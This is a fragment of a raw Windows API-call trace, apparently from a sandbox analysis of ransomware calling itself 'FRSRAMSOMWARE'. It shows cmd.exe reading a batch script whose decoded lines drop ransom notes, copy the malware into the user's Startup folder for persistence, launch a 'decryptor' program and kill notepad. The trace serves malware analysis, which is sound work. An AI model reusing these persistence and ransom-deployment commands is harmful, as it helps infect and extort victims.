lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0143.812] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0143.812] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.812] GetFileType (hFile=0x154) returned 0x1 [0143.812] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0143.812] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.813] SetFilePointer (in: hFile=0x154, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0143.813] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0143.813] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0143.813] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.813] GetFileType (hFile=0x154) returned 0x1 [0143.813] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0143.813] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.813] SetFilePointer (in: hFile=0x154, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0143.813] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0143.813] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0143.813] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.813] GetFileType (hFile=0x154) returned 0x1 [0143.813] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0143.813] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.813] SetFilePointer (in: hFile=0x154, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0143.813] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0143.813] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0143.813] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.813] GetFileType (hFile=0x154) returned 0x1 [0143.813] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0143.813] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.813] SetFilePointer (in: hFile=0x154, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0143.813] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0143.814] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0143.814] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.814] GetFileType (hFile=0x154) returned 0x1 [0143.814] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0143.814] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.814] SetFilePointer (in: hFile=0x154, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0143.814] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0143.814] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0143.814] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.814] GetFileType (hFile=0x154) returned 0x1 [0143.814] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0143.814] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.814] SetFilePointer (in: hFile=0x154, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0143.814] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0143.814] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0143.814] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.814] GetFileType (hFile=0x154) returned 0x1 [0143.814] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0143.814] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.814] SetFilePointer (in: hFile=0x154, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0143.814] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0143.814] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0143.814] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.814] GetFileType (hFile=0x154) returned 0x1 [0143.815] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0143.815] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0143.815] SetFilePointer (in: hFile=0x154, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0143.815] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0143.815] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0143.815] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.815] GetFileType (hFile=0x154) returned 0x1 [0143.815] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0143.815] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0143.815] SetFilePointer (in: hFile=0x154, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0143.815] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0143.815] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0143.815] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.815] GetFileType (hFile=0x154) returned 0x1 [0143.815] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0143.815] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0143.815] SetFilePointer (in: hFile=0x154, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0143.815] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0143.815] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0143.815] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.815] GetFileType (hFile=0x154) returned 0x1 [0143.815] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0143.815] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0143.816] SetFilePointer (in: hFile=0x154, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0143.816] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0143.816] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0143.816] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.816] GetFileType (hFile=0x154) returned 0x1 [0143.816] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0143.816] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0143.816] SetFilePointer (in: hFile=0x154, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0143.816] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0143.816] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0143.816] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.816] GetFileType (hFile=0x154) returned 0x1 [0143.816] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0143.816] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0143.816] SetFilePointer (in: hFile=0x154, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0143.816] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0143.816] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0143.816] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.816] GetFileType (hFile=0x154) returned 0x1 [0143.816] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0143.816] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0143.816] SetFilePointer (in: hFile=0x154, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0143.817] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0143.817] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0143.817] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.817] GetFileType (hFile=0x154) returned 0x1 [0143.817] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0143.817] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0143.817] SetFilePointer (in: hFile=0x154, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0143.817] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0143.817] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0143.817] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.817] GetFileType (hFile=0x154) returned 0x1 [0143.817] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0143.817] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0143.817] SetFilePointer (in: hFile=0x154, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0143.817] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0143.817] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0143.817] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.817] GetFileType (hFile=0x154) returned 0x1 [0143.817] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0143.817] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0143.817] SetFilePointer (in: hFile=0x154, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0143.817] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0143.817] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0143.818] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.818] GetFileType (hFile=0x154) returned 0x1 [0143.818] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0143.818] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0143.818] SetFilePointer (in: hFile=0x154, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0143.818] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0143.818] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0143.818] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.818] GetFileType (hFile=0x154) returned 0x1 [0143.818] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0143.818] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0143.818] SetFilePointer (in: hFile=0x154, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0143.818] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0143.818] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0143.818] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.818] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0143.818] _get_osfhandle (_FileHandle=0) returned 0x24 [0143.819] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0143.819] SetConsoleInputExeNameW () returned 0x1 [0143.819] GetConsoleOutputCP () returned 0x1b5 [0143.819] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0143.819] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.819] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0143.819] _open_osfhandle (_OSFileHandle=0x154, _Flags=8) returned 3 [0143.819] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.819] SetFilePointer (in: hFile=0x154, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0143.819] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0143.819] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0143.819] SetFilePointer (in: hFile=0x154, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0143.820] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0143.820] GetFileType (hFile=0x154) returned 0x1 [0143.820] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.820] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0143.820] _tell (_FileHandle=3) returned 2512 [0143.820] _close (_FileHandle=3) returned 0 [0143.820] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0143.820] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0143.820] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0143.820] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0143.820] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0143.820] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0143.820] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0143.820] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0143.820] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0143.820] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0143.820] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0143.820] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0143.820] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0143.820] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0143.820] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0143.820] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0143.820] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0143.820] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0143.820] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0143.820] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0143.820] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0143.820] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0143.820] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0143.820] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0143.820] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0143.820] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0143.820] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0143.820] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0143.821] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0143.821] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0143.821] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0143.821] _wcsicmp (_String1="ping", 